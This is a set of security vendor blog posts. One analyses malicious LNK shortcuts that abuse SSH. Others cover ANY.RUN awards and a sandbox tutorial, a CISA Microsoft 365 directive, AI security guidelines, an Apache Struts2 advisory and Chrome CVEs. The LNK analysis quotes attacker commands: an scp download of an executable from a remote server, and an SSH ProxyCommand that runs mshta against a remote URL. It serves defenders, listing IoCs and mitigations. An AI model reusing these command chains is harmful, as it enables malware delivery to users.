LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks

/in

Cyble - Transparent Tribe

Overview

Starting this year, Cyble Research and Intelligence Labs (CRIL) has observed a significant trend where threat actors (TAs) have increasingly leveraged LNK files as an initial infection vector in multiple campaigns. These malicious shortcut files, often disguised as legitimate documents, have become a preferred entry point for attackers seeking to compromise systems. This shift in tactics aims to bypass traditional security mechanisms and deceive users into executing the malicious LNK file, thereby initiating a multi-stage cyber attack to deploy the final payload.

In these campaigns, the LNK files are meticulously crafted to execute commands using multiple Living-off-the-Land Binaries (LOLBins). By exploiting the inherent functionalities of these binaries, attackers can download or execute additional malicious components, thereby advancing their attack chain.

While modern endpoint detection and response (EDR) solutions have evolved to detect such activities by monitoring the behavior of LNK files and flagging suspicious use of known LOLBin binaries, this has led TAs to refine their techniques to bypass these advanced security measures.

Recently, CRIL uncovered an additional layer of sophistication in these attacks: the use of SSH commands within malicious LNK files to execute a range of malicious activities. This emerging technique highlights how threat actors leverage SSH commands to maintain persistence and control over compromised systems.

While the malicious use of SSH is not a new tactic, its ongoing relevance as an evasion technique underscores the need for continuous vigilance in monitoring trusted utilities for anomalous behavior.

Pivoting on the identified SSH abuse techniques, CRIL has tracked several campaigns where SSH commands were exploited to carry out malicious operations, further emphasizing the evolution of attack methods. Notably, APT groups have also incorporated this technique into their arsenal, highlighting their growing use in sophisticated cyber campaigns.

SSH using the SCP command

In this campaign, a malicious .LNK file is configured to execute SSH commands that use the scp (Secure Copy Protocol) command to download a malicious file and execute it on the local system. The image below illustrates the contents of the .LNK file.

Figure 1 – Contents of the .LNK file

The use of SSH commands and SCP on Windows systems is relatively less, which may allow malicious activity to go undetected by traditional security solutions that are not specifically configured to monitor such behavior.

The .LNK file is configured with the following SSH options to facilitate the attack:

  • -o “PermitLocalCommand=yes”: Allows the execution of a local command once the SSH connection is established.

  • -o “StrictHostKeyChecking=no”: Disables host key verification, bypassing prompts or errors when connecting to untrusted servers.

Once the SSH connection is established, the SSH client executes the SCP command:

  • scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:userspublic

This command downloads a malicious file named christmas-sale.exe from the /home/revenge directory on the remote server to the local directory c:userspublic. The downloaded file is then executed, advancing the attack chain.

Abuse of SSH and PowerShell Commands

In this campaign, a malicious .LNK file is configured to execute an SSH command that indirectly runs a malicious PowerShell command. The .LNK file utilizes a ProxyCommand option in the SSH command to execute PowerShell, which then invokes mshta.exe to access a remote malicious URL. The execution of this command allows the attacker to download and execute a potentially harmful payload on the local system. The image below shows the contents of the .LNK file.

Figure 2 – Contents of the .LNK File

The .LNK file is configured with the following SSH options:

  • -o ProxyCommand=”powershell powershell -Command (‘mshta.exe https://www.google.ca/amp/s/goo.su/IwPQJP’

The SSH client executes the PowerShell command, which runs mshta.exe to fetch and execute the malicious script from the specified URL.

Abuse of SSH and CMD Commands

In this campaign, a malicious .LNK file is crafted to execute an SSH command, which then triggers rundll32 to load a malicious DLL and launch a PDF file (lure document), both located in the current directory. The image below illustrates the contents of the .LNK file.

Figure 3 – Contents of the LNK file

The SSH client executes cmd.exe, which in turn launches the rundll32 utility to load the malicious DLL and execute the PDF, advancing the attack chain.

By analyzing the artifacts and DLL payload associated with this campaign, we observed behavior resembling stealer malware compiled in Go, which we previously discussed in a blog targeting the Indian Air Force. Additionally, another article highlights similar behavior, attributing the stealer payload (HackBrowserData—an open-source tool) to the APT group ‘Transparent Tribe’.

Conclusion

The combination of LNK files and SSH commands has emerged as a notable trend in recent campaigns, signaling a shift in the tactics used by threat actors. By leveraging SSH commands in conjunction with various LOLBins, attackers can establish connections to remote servers, download payloads, and maintain persistence on compromised systems. As demonstrated in the analyzed campaigns, these techniques are continuously evolving, with threat actors refining their methods to evade detection by exploiting trusted system utilities. As the cyber threat landscape progresses, organizations must remain vigilant and adapt their security strategies to effectively counter these increasingly sophisticated attack vectors.

The Sigma rule to detect these campaigns leveraging SSH commands is available for download from the GitHub repository. 

Recommendations

  • To mitigate potential SSH abuse, closely monitor the activities of the legitimate SSH utility, restrict its usage to authorized users, and implement robust detection mechanisms to identify suspicious activities involving ssh.exe, particularly those with abnormal or malicious command-line parameters.

  • Disable OpenSSH features on systems where it is not required.

Indicators of Compromise (IoCs)

Indicators Indicator Type Description
8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494 SHA-256 Lnk file – Campaign 1
5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 SHA-256 Lnk file – Campaign 2
0016e1ec6fc56e4214e7d54eb7ab3d84a4a83b4befd856e984d77d6db8fc221d SHA-256 Lnk file – Campaign 3

References

https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/

https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors

https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign

The post LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks appeared first on Cyble.

Blog – Cyble – ​Read More

Well done, ANY.RUN: Our Top Cybersecurity Awards in 2024

/in

It’s December, and it’s high time to tell Santa how good girls and boys we’ve been at ANY.RUN. It’s time to reap acknowledgment from the industry, the community, and the customers. Here are the major tech awards we’ve received in 2024 as cybersecurity experts.  

Cybersecurity Excellence Awards from Cybersecurity Insiders

We nailed it in the Threat Hunting category. And we are proud: the award is well respected throughout the industry. Winners are selected by both community votes and judging panel evaluations. This ensures that recognition reflects real-world impact and peer validation.  
 
Holger Schulze, CEO of Cybersecurity Insiders:

With over 600 entries across more than 300 categories, the awards are highly competitive. Your achievement reflects outstanding commitment to the core principles of excellence, innovation, and leadership in cybersecurity.

Best Security Solution from World Future Awards 

The entire suite of ANY.RUN’s services, including the Interactive Sandbox, Threat Intelligence Lookup, and TI Feeds, was recognized as the “Best Threat Intelligence & Interactive Malware Analysis Platform.

That’s what the FWA team thinks of us:

ANY.RUN’s innovative, user-friendly malware analysis platform excels in its impact, value, and timeliness, making it a standout in the cybersecurity industry. The platform’s high quality and emotional quotient ensure it meets the evolving challenges of its users effectively.

TI Lookup lets you find and explore domains, IPs, events, files, and other details related to your query

For those who haven’t yet had a chance to explore Threat Intelligence Lookup, it is ANY.RUN’s flagship product that lets security professionals enrich their investigations into the latest malware and phishing threats.

It offers a searchable database of fresh Indicators of Compromise (IOCs), Indicators of Behavior (IOBs), and Indicators of Attack (IOAs), extracted from public samples analyzed in ANY.RUN’s sandbox.

Get 20 free requests to test TI Lookup 



Contact us


Top 150 Cybersecurity Vendors by IT-Harvest 

We are in the list of Top 150 cybersecurity vendors. It is a well-respected global industry benchmark supported by IT-Harvest. It gathers top-tier vendors in cybersecurity — which is, by the way, a highly competitive and densely populated field.

ANY.RUN “managed to make an outstanding contribution to the cybersecurity landscape”, Richard Stiennon, Chief Research Analyst at IT-Harvest, says.  

Best in Behavior Analytics by CyberSecurity Breakthrough Awards 

We are grateful to be recognized for delivering quality behavior analytics, as it is among the key features of the ANY.RUN sandbox. It implies detailed analysis of network activity, and the processes malware agents initiate and engage in.

Automated Interactivity quickly identifies and detonates Formbook inside an archive attached to an email

Besides, this fall we’ve taken our Automated Interactivity feature to the next level by implementing the Smart Content Analysis mechanism. The enhanced Automated Interactivity simplifies malicious behavior analysis and spares user’s time by identifying and auto-detonating the key components of malware at each stage of the attack. 
 
So the recognition was well deserved. But no time to rest on our laurels. We have huge plans for 2025, stay tuned!

Try Automated Interactivity and other PRO features
of the ANY.RUN Sandbox for free 



Request 14-day trial


Special Thanks to the ANY.RUN Community  

We would like to send our love and appreciation to our unique community.

Every analytic session, every piece of feedback, and every insight you provide helps us grow and improve. You are not just users — you are collaborators in our mission to build a safer digital world. 

About ANY.RUN  

ANY.RUN is a leading provider of a cloud-based malware analysis sandbox for effective threat hunting. Our service lets users safely and quickly analyze malware without the need for on-premises infrastructure. ANY.RUN is used by organizations of all sizes, including Fortune 500 companies, government agencies, and educational institutions.

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Get a 14-day free trial of ANY.RUN’s Interactive Sandbox →

The post Well done, ANY.RUN: Our Top Cybersecurity Awards in 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

CISA Orders Federal Agencies to Secure Microsoft 365 Environments

/in

Cyble Microsoft 365

Overview

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has directed the Federal Civilian Executive Branch to implement more than 50 policies to secure Microsoft 365 environments.

The new policies, Binding Operational Directive (BOD) 25-01: Implementing Secure Practices for Cloud Services, apply to Azure Active Directory/Entra ID, Microsoft Defender, Exchange Online, Power Platform, SharePoint Online and OneDrive, and Microsoft Teams.

CISA has the authority to secure the more than 100 agencies that make up the FCEB, which doesn’t include Defense, National Security, and Intelligence agencies. However, CISA said it “strongly recommends all stakeholders implement these policies … Doing so will reduce significant risk and enhance collective resilience across the cybersecurity community.”

CISA plans guidance for other cloud environments next year, including Google Workspace. The new cloud security directive comes amid a flurry of activity from CISA, including a draft National Cyber Incident Response Plan, as the agency’s leadership prepares to depart next month when the new Administration takes office.

Microsoft 365 Security Issues

The Microsoft guidance comes after a year in which Microsoft 365 security came under heavy scrutiny. A U.S. Cyber Safety Review Board (CSRB) report earlier this year detailed “a cascade of security failures at Microsoft” that allowed China-linked threat actors in July 2023 to access “the official email accounts of many of the most senior U.S. government officials managing our country’s relationship with the People’s Republic of China.” A Congressional hearing followed, along with pledges by Microsoft to make security a top priority.

Amazon recently paused a Microsoft 365 rollout after discovering security issues, according to a Bloomberg report, bringing fresh attention to the issue.

CISA’s Microsoft 365 Directive

CISA’s timeline gives federal civilian agencies until June 20, 2025, to “comply with a defined set of these Secure Cloud Baselines, deploy automated configuration assessment tools to check compliance, and to remediate deviations from these policies under BOD 25-01.”

The first policy in the directive requires Azure AD and Entra ID implementations to block legacy protocols that don’t allow multi-factor authentication (MFA).

Other Azure AD and Entra ID policies require that high-risk users and sign-ins be blocked, enforcing phishing-resistant MFA or an alternative, and setting the Authentication Methods Manage Migration feature to Migration Complete. Roughly two-thirds of the 21 policies in the Azure AD and Entra ID section involve securing privileged accounts.

Defender policies call for enabling standard and strict preset security policies, protecting sensitive accounts and information, and enabling logging and alerts.

Exchange policies include disabling SMTP AUTH and automatic forwarding to external domains, implementing SPF and DMARC policies, and enabling external sender warnings and mailbox auditing.

Power Platform policies call for limiting trial, production, and sandbox creation to admins, creating a DLP policy to restrict connector access in the default Power Platform environment, and enabling tenant isolation.

SharePoint Online and OneDrive policies include limiting external sharing and file and folder sharing, and preventing custom scripts on self-service created sites.

Teams controls include limiting access for external, unmanaged, and anonymous users, blocking contact with Skype, and disabling email integration.

CISA also provides assessment tools and guidance through the Secure Cloud Business Applications (SCuBA) project.

Conclusion

CISA has provided federal agencies with strong best practices for securing Microsoft 365 environments. These policies, based on principles of least privilege and strict authentication and access control, could also apply to other cloud environments.

Cyble’s Cloud Security Posture Management (CSPM) and threat intelligence tools offer organizations automated, cost-effective cloud compliance and monitoring, with the ability to detect misconfigurations and leaks before they turn into major incidents.

The post CISA Orders Federal Agencies to Secure Microsoft 365 Environments appeared first on Cyble.

Blog – Cyble – ​Read More

Measures for safe development and use of AI | Kaspersky official blog

/in

Today, AI-based technologies are already being used in every second company — with another 33% of commercial organizations expected to join them in the next two years. AI, in one form or another, will soon be ubiquitous. The economic benefits of adopting AI range from increased customer satisfaction to direct revenue growth. As businesses deepen their understanding of AI systems’ strengths and weaknesses, their effectiveness will only improve. However, it’s already clear that the risks associated with AI adoption need to be addressed proactively.

Even early examples of AI implementation show that errors can be costly — affecting not only finances but also reputation, customer relationships, patient health, and more. In the case of cyber-physical systems like autonomous vehicles, safety concerns become even more critical.

Implementing safety measures retroactively, as was the case with previous generations of technology, will be expensive and sometimes impossible. Just consider the recent estimates of global economic losses due to cybercrime: $8 trillion in 2023 alone. In this context, it’s not surprising that countries claiming 21st century technological leadership are rushing to set up AI regulation (for example, China’s AI Safety Governance Framework, the EU’s AI Act, and the US Executive Order on AI). However, laws rarely specify technical details or practical recommendations — that’s not their purpose. Therefore, to actually apply regulatory requirements such as ensuring the reliability, ethics, and accountability of AI decision-making, concrete and actionable guidelines are required.

To assist practitioners in implementing AI today and ensuring a safer future, Kaspersky experts have developed a set of recommendations in collaboration with Allison Wylde, UN Internet Governance Forum Policy Network on AI team-member; Dr. Melodena Stephens, Professor of Innovation & Technology Governance from the Mohammed Bin Rashid School of Government (UAE); and Sergio Mayo Macías, Innovation Programs Manager at the Technological Institute of Aragon (Spain). The document was presented during the panel “Cybersecurity in AI: Balancing Innovation and Risks” at the 19th Annual UN Internet Governance Forum (IGF) for discussion with the global community of AI policymakers.

Following the practices described in the document will help respective engineers — DevOps and MLOps specialists who develop and operate AI solutions — achieve a high level of security and safety for AI systems at all stages of their lifecycle. The recommendations in the document need to be tailored for each AI implementation, as their applicability depends on the type of AI and the deployment model.

Risks to consider

The diverse applications of AI force organizations to address a wide range of risks:

  • The risk of not using AI. This may sound amusing, but it’s only by comparing the potential gains and losses of adopting AI that a company can properly evaluate all other risks.
  • Risks of non-compliance with regulations. Rapidly evolving AI regulations make this a dynamic risk that needs frequent reassessment. Apart from AI-specific regulations, associated risks such as violations of personal-data processing laws must also be considered.
  • ESG risks. These include social and ethical risks of AI application, risks of sensitive information disclosure, and risks to the environment.
  • Risk of misuse of AI services by users. This can range from prank scenarios to malicious activities.
  • Threats to AI models and datasets used for training.
  • Threats to company services due to AI implementation.
  • The resulting threats to the data processed by these services.

“Under the hood” of the last three risk groups lie all typical cybersecurity threats and tasks involving complex cloud infrastructure: access control, segmentation, vulnerability and patch management, creation of monitoring and response systems, and supply-chain security.

Aspects of safe AI implementation

To implement AI safely, organizations will need to adopt both organizational and technical measures, ranging from staff training and periodic regulatory compliance audits to testing AI on sample data and systematically addressing software vulnerabilities. These measures can be grouped into eight major categories:

  • Threat modeling for each deployed AI service.
  • Employee training. It’s important not only to teach employees general rules for AI use, but also to familiarize business stakeholders with the specific risks of using AI and tools for managing those risks.
  • Infrastructure security. This includes identity security, event logging, network segmentation, and XDR.
  • Supply-chain security. For AI, this involves carefully selecting vendors and intermediary services that provide access to AI, and only downloading models and tools from trusted and verified sources in secure formats.
  • Testing and validation. AI models need to be evaluated for compliance with the industry’s best practices, resilience to inappropriate queries, and their ability to effectively process data within the organization’s specific business process.
  • Handling vulnerabilities. Processes need to be established to address errors and vulnerabilities identified by third parties in the organization’s system and AI models. This includes mechanisms for users to report detected vulnerabilities and biases in AI systems, which may arise from training on non-representative data.
  • Protection against threats specific to AI models, including prompt injections and other malicious queries, poisoning of training data, and more.
  • Updates and maintenance. As with any IT system, a process must be built for prioritizing and promptly eliminating vulnerabilities, while preparing for compatibility issues as libraries and models evolve rapidly.
  • Regulatory compliance. Since laws and regulations for AI safety are being adopted worldwide, organizations need to closely monitor this landscape and ensure their processes and technologies comply with legal requirements.

For a detailed look at the AI threat landscape and recommendations on all aspects of its safe use, download Guidelines for Secure Development and Deployment of AI Systems.

Kaspersky official blog – ​Read More

How DFIR Analysts Use ANY.RUN Sandbox

/in

Recently, DFIR consultant & content creator/educator Steven from the YouTube channel MyDFIR released a new video showing how DFIR professionals can leverage the ANY.RUN Sandbox to efficiently analyze malware and extract actionable intelligence.  

The video provides a step-by-step guide on investigating real-world threats, including how to quickly identify and analyze Indicators of Compromise (IOCs) and uncover key behavioral insights. 

If you’re looking to improve your investigation workflows and see practical examples of malware analysis in action, we highly recommend watching the video to follow along with the expert’s process. 

Here’s our overview of the key highlights covered in the video. 

About ANY.RUN Sandbox 

The ANY.RUN Sandbox is an interactive malware analysis platform that enables security professionals to analyze malicious files in a live, user-driven environment. It allows DFIR professionals to: 

  • Uncover the behaviors and tactics of malware. 
  • Quickly gather critical Indicators of Compromise (IOCs). 
  • Explore malware configurations and identify threats in real time. 

By providing detailed insights through features like process trees, network monitoring, and integrated ATT&CK mapping, ANY.RUN helps analysts stay ahead of emerging threats and streamline investigations. 

Analyze malware and phishing threats
in ANY.RUN’s Interactive Sandbox for free 



Sign up now


Use Case 1: Investigating Formbook Infostealer 

Formbook is a widespread infostealer that targets credentials, cookies, and other sensitive data. Here’s how DFIR professionals can use ANY.RUN to analyze it. 

Imagine you have received the following alert: malware detected and quarantined. 

The alert also provides details such as: 

  • Hostname: SALESPC-01 
  • User: Bobby  
  • Filename: suchost.exe  
  • Current Directory: C:UsersBobbyDownloads 
  • SHA256: 472a703381c8fe89f83b0fe4d7960b0942c5694054ba94dd85c249c4c702e0cd 

Use this information to initiate your investigation. 

Check Previous Analyses 

The first thing you should do is check if ANY.RUN analyzed this file previously. Navigate to ANY.RUN’s Reports section, located on the left-hand side.  

Reports section inside ANY.RUN

Search for the hash of the flagged file. If the file has already been analyzed, review the existing reports. Otherwise, upload the file to initiate a fresh analysis. 

In our case, there are 2 analysis sessions found from October 2024. Let’s choose the first report and look closer at what’s inside.  

After clicking on the existing entry, you’ll be redirected to the ANY.RUN sandbox presented with a lot of useful information. 

Public submissions related to specific IOC 

Let’s use this analysis to see how the sandbox can help us. 

Examine Initial Results 

ANY.RUN provides an overview of the analysis, including malicious activity indicators, the operating system used for analysis (e.g., Windows 10 64-bit), and a suite of options, such as: 

  • Get Sample: Download the file for deeper analysis. 
  • IOC Tab: View all related IOCs. 
  • MalConf: Explore indicators extracted from the malware’s configuration. 
  • Restart: Re-run the analysis if needed. 
  • Text Report: Get a detailed overview of findings. 
  • Graph: Visualize the process tree and events. 
  • ATT&CK Tab: Review associated tactics, techniques, and procedures (TTPs). 
  • AI Summary: Summarize key findings. 
  • Export Options: Save results in various formats like STIX or MISP JSON. 
Malicious activity identified by ANY.RUN sandbox 

Analyze the Process Tree 

Study the parent-child relationship in the process tree to understand how the file behaves.  

Process tree inside ANY.RUN

For example, Formbook may create a registry key to establish persistence. By clicking on the process, you can view command-line details and trace the registry key creation and file execution paths. 

Process of creating registry key displayed inside ANY.RUN sandbox

Investigate Network Activity 

Use the network-related tabs to track events like HTTP requests and connections. ANY.RUN simplifies this by flagging requests with reputation icons: 

  • Green checkmark: Known and safe. 
  • Question mark: Unknown. 
  • Fire icon: Malicious. Document any flagged IOCs, such as suspicious IP addresses or domains, and cross-check them within your environment. 
Reputation icons for faster malware analysis

Leverage Threat Hunting Features 

Utilize tabs like MalConf and ATT&CK to uncover additional insights. For instance, MalConf may reveal hardcoded strings or configurations that can aid in threat hunting.  

Malware configuration tab displayed in ANY.RUN sandbox

The ATT&CK tab provides a breakdown of associated TTPs, helping analysts understand how the malware evades detection or escalates privileges. 

In the current analysis session, these are the TTPs the sandbox identified: 

TTPs related to Formbook analysis session

AI Summary 

The AI-powered summary distills the technical findings into easy-to-understand insights. This is particularly beneficial for: 

  • Quickly understanding the file’s behavior without diving into the technical minutiae. 
  • Assisting junior analysts or teams new to malware analysis by providing clear explanations of what the file is doing. 
AI summary of processes inside ANY.RUN sandbox

By leveraging these features, DFIR professionals can perform detailed, thorough, and efficient malware analysis, tailoring their investigations to the specific needs of their organization. 


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis


Read full guide


Use Case 2: Analyzing Lumma Stealer with Advanced Features 

The next use case focuses on analyzing a file using the ANY.RUN sandbox, specifically targeting a different infostealer called Luma Stealer. The latter is another malware aimed at exfiltrating data. 

For this demonstration, the free plan is used, but comparisons to the paid plan capabilities will also be highlighted. 

Uploading a File to ANY.RUN 

To analyze a file in ANY.RUN, start by selecting Submit File option from the available 3 options.  

When uploading a file, keep in mind that as a free user Analysis will be public, meaning anyone can view it. Avoid uploading sensitive data. Always consult with your team if unsure. 

The free plan, however, offers privacy options to restrict access to your analysis. 

After selecting the file, you’ll see two key options: 

  1. Deep analysis: Ideal for file-based malware investigations. 
  2. Safebrowsing: Suitable for URL-based fast analysis. 

For this case, we’re performing Deep Analysis on the Luma Stealer sample.  

Explore the entire analysis session 

Configuration options for new analysis session 

Configuration Options 

ANY.RUN allows you to customize execution and environment settings to simulate real-world scenarios. For instance, you can specify custom command-line arguments to trigger specific malware behaviors. 

  • The free plan offers 60 seconds of analysis.  
  • With the paid plan, you can extend to 10+ minutes for deeper analysis. 

You can also choose where you want to execute the file, for instance, temp directory, desktop, downloads directory, AppData, and more. 

For the network traffic the following options are available: 

  • FakeNet: Simulates network traffic. 
  • TOR Routing: Routes traffic through Tor for anonymity. 
  • Residential Proxy: Assigns a residential IP to your VM. 

Then, choose the operating system, such as Windows 7 (32-bit), Windows 10 (64-bit), and Ubuntu 22.04. The paid plan also offers Windows 11

Running the Analysis 

Once configurations are set, click Run Analysis. If you decide to go with the Public mode, a warning will remind you that the analysis data will be publicly accessible. To make your analysis private, you will need to get a Hunter or Enterprise plan subscription. 

The sandbox begins dynamic analysis, executing the file and recording all processes, behaviors, and network activities. 

A timer (top-right) shows the remaining analysis duration. You can add time to capture extended malware behaviors. 

Observing Results in Real Time 

Once the analysis begins, you can interact with the sandbox environment. Have a look at the parent-child relationships of processes generated by the malware. 

On the right corner you can already see the sandbox identifies the processes as Lumma malware and possible phishing. 

Besides, we can note that the sandbox also detected a domain used for C2 connection: 

Suricata rule triggered by Lumma malware

With the paid plan you can also see how this particular Suricata rule was generated: 

Suricata rule details available for Hunter and Enterprise users

Extracting IOCs and Key Artifacts 

The sandbox lists malicious IOCs that can be used to detect the threat

Once the analysis completes, go to the IOC tab to extract key indicators, including: 

  • IP addresses 
  • Domains 
  • File hashes 
  • URLs   

Why DFIR Professionals Rely on ANY.RUN 

ANY.RUN’s real-time, interactive capabilities make it a favorite among DFIR experts. Here’s why: 

  • Speed: Analyze malware behavior and extract IOCs faster than ever. 
  • Ease of use: Its intuitive interface works for both seasoned analysts and newcomers. 
  • Flexibility: From free plans to enterprise solutions, ANY.RUN fits teams of all sizes. 
  • Threat intelligence integration: Enrich your investigations with additional context to ensure thorough results. 

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Get 14-day free trial of ANY.RUN’s Interactive Sandbox →

The post How DFIR Analysts Use ANY.RUN Sandbox appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

ACSC Warns of Remote Code Execution Risk in Apache Struts2

/in

Cyble Apache Struts2

Overview

The Australian Cyber Security Center (ACSC) has alerted organizations about a severe vulnerability in the Apache Struts2 Framework. The vulnerability, CVE-2024-53677, has been identified in the Framework, posing a critical risk to organizations that use, develop, or support Java-based applications built on this widely adopted framework. 

This vulnerability primarily affects versions of Apache Struts2 before 6.4.0 and can lead to severe security breaches, including remote code execution (RCE). Australian organizations using these versions must take immediate action to mitigate the risks posed by this flaw.

CVE-2024-53677 is a critical file upload vulnerability in the Apache Struts2 Framework. It allows attackers to exploit path traversal flaws and manipulate file upload parameters. The flaw is found in the deprecated File Upload Interceptor component.

Under certain circumstances, this can lead to the uploading of malicious files that could be executed remotely, potentially giving attackers full control over the affected system. The issue is particularly concerning for enterprise Java applications that rely on Apache Struts2.

Details of Apache Struts2 Framework Vulnerability (CVE-2024-53677)

According to the Apache advisory, the affected versions of Struts include Struts 2.0.0 through 2.3.37 (end-of-life versions), Struts 2.5.0 through 2.5.33, and Struts 6.0.0 through 6.3.0.2. The vulnerability has been classified as “critical,” with a CVSSv3 score of 9.8, reflecting its potential for exploitation. 

This issue is not isolated; Apache Struts vulnerabilities have been popular targets for threat actors, with two major incidents occurring in 2017 and 2023. As such, CVE-2024-53677 must be taken seriously by organizations that continue to use older versions of Struts.

Organizations using Java applications that leverage the affected versions of Apache Struts2 are at high risk of exploitation. This includes various industries such as government, telecommunications, finance, and e-commerce, where the framework remains integral to business operations.

The critical nature of CVE-2024-53677 lies in its ability to facilitate remote code execution. Once an attacker successfully uploads a malicious file—often a web shell—through the vulnerable file upload mechanism, they can execute arbitrary commands, steal sensitive data, and further compromise the system.

Recommendations for securing your systems

Organizations are strongly advised to take the following steps to mitigate the risks associated with CVE-2024-53677:

  • The most effective way to address the vulnerability is to upgrade to Apache Struts 6.4.0 or a later version. This version replaces the deprecated File Upload Interceptor with the more secure Action File Upload Interceptor, which significantly reduces the risk of exploitation. However, migrating to this new file upload mechanism requires modifications to the existing code, as the old File Upload Interceptor is no longer secure.

  • If upgrading to Struts 6.4.0 is not immediately feasible, organizations should apply any available patches for affected versions of Struts. Additionally, continuous monitoring of systems for suspicious activity is crucial. Logs should be reviewed regularly for any indications of attempts to exploit the vulnerability.

  • Organizations should audit their Java-based applications to determine whether they are using the affected versions of Apache Struts. They should also verify whether the vulnerable File Upload Interceptor component is being used. Applications that do not rely on this component are not affected by CVE-2024-53677.

  • Given the critical nature of this vulnerability, organizations must stay updated on vendor advisories and any new patches or security releases. Apache’s security bulletins should be regularly checked to ensure that any new information or mitigation strategies are quickly applied.

Conclusion 

CVE-2024-53677 presents a critical risk of remote code execution (RCE), allowing attackers to exploit file upload vulnerabilities and gain unauthorized control over systems. Organizations using Struts2 versions prior to 6.4.0 must upgrade immediately and migrate to the new Action File Upload Interceptor.

Prompt patching and monitoring are essential to prevent exploitation. To strengthen defenses, businesses can turn to Cyble’s AI-powered cybersecurity solutions like Cyble Vision, which offer advanced threat intelligence, dark web monitoring, and proactive risk detection. Discover how Cyble Vision can enhance your cybersecurity strategy by booking a free demo today.

References:

https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-security-vulnerability-affecting-apache-struts2-below-6-4-0

The post ACSC Warns of Remote Code Execution Risk in Apache Struts2 appeared first on Cyble.

Blog – Cyble – ​Read More

Multiple Vulnerabilities in Google Chrome for Desktop: Update to Stay Secure

/in

Cyble Google Chrome

Overview

On December 16, 2024, the Indian Computer Emergency Response Team (CERT-In) issued a vulnerability note (CIVN-2024-0356) regarding multiple security flaws in Google Chrome for Desktop. These vulnerabilities, rated HIGH in severity, could allow remote attackers to execute malicious code or disrupt the system’s functionality through a Denial of Service (DoS) attack.

Affected Software Versions

These vulnerabilities impact the following versions of Google Chrome for Desktop:

  • Windows and macOS: Versions prior to 131.0.6778.139/.140 and 131.0.6778.108/.109.

  • Linux: Versions prior to 131.0.6778.139 and 131.0.6778.108.

All end-user organizations and individuals using Google Chrome for Desktop are urged to update their browsers immediately to prevent potential exploits.

Impact of the Vulnerabilities

The identified vulnerabilities can lead to the following risks:

  1. Remote Code Execution: A remote attacker could execute arbitrary code on a target system using a maliciously crafted webpage.

  2. Denial of Service (DoS): Attackers can crash the browser or make it unresponsive, causing system instability.

  3. Sensitive Information Disclosure: Exploitation may allow access to sensitive information stored in the browser.

Detailed Description of the Vulnerabilities

Google Chrome, a widely-used web browser across Windows, macOS, and Linux systems, is vulnerable to specific flaws caused by improper handling of memory during certain operations. Below is a breakdown of the vulnerabilities:

1. CVE-2024-12381: Type Confusion in V8

  • Severity: High

  • Description: The V8 JavaScript engine, used by Google Chrome to process web content, has a Type Confusion issue. Type Confusion occurs when the browser misinterprets the type of an object, leading to unexpected behavior. This flaw can result in heap corruption when a specially crafted HTML page is executed.

  • Reported by: Seunghyun Lee (@0x10n) on December 2, 2024.

  • Affected Versions: Google Chrome prior to version 131.0.6778.139/.140.

2. CVE-2024-12382: Use After Free in Translate

  • Severity: High

  • Description: A Use After Free vulnerability exists in Google Chrome’s Translate component. Use After Free occurs when memory is accessed after it has been freed, leading to unexpected behavior or crashes. Exploiting this vulnerability via a crafted HTML page can cause heap corruption or allow remote code execution.

  • Reported by: lime (@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group on November 18, 2024.

  • Affected Versions: Google Chrome prior to version 131.0.6778.139/.140.

3. CVE-2024-12053: Type Confusion in V8

  • Severity: High

  • Description: Another Type Confusion vulnerability in the V8 engine impacts earlier versions of Google Chrome. Exploitation through a malicious HTML page can result in object corruption, potentially leading to system compromise.

  • Reported by: gal1ium and chluo on November 14, 2024.

  • Affected Versions: Google Chrome prior to version 131.0.6778.108/.109.

How Can These Vulnerabilities Be Exploited?

Attackers can take advantage of these vulnerabilities by luring users to visit a specially crafted webpage. Once the webpage is loaded, it can trigger the security flaws, allowing the attacker to:

  • Execute malicious code remotely on the target system.

  • Corrupt memory, causing the browser to crash.

  • Steal sensitive data or compromise system functionality.

Given the widespread use of Google Chrome, it is critical to address these vulnerabilities immediately.

Solution: Update Google Chrome Immediately

Google has addressed these vulnerabilities by releasing updated versions of Chrome for Desktop on the Stable Channel. The updates are being rolled out gradually, and all users are advised to apply them as soon as possible.

Updated Versions

  • Windows and macOS: Version 131.0.6778.139/.140

  • Linux: Version 131.0.6778.139

To update Google Chrome:

  1. Open Google Chrome.

  2. Click on the three dots (Menu) in the top-right corner.

  3. Navigate to Help > About Google Chrome.

  4. Chrome will automatically check for updates and install the latest version.

  5. Restart the browser to apply the update.

Security Fixes and Acknowledgements

Google has credited several external security researchers for identifying and reporting these vulnerabilities:

  • CVE-2024-12381: Seunghyun Lee (@0x10n) – Awarded $55,000 for discovering the issue.

  • CVE-2024-12382: lime (@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group.

  • CVE-2024-12053: gal1ium and chluo – Awarded $8,000 for identifying the flaw.

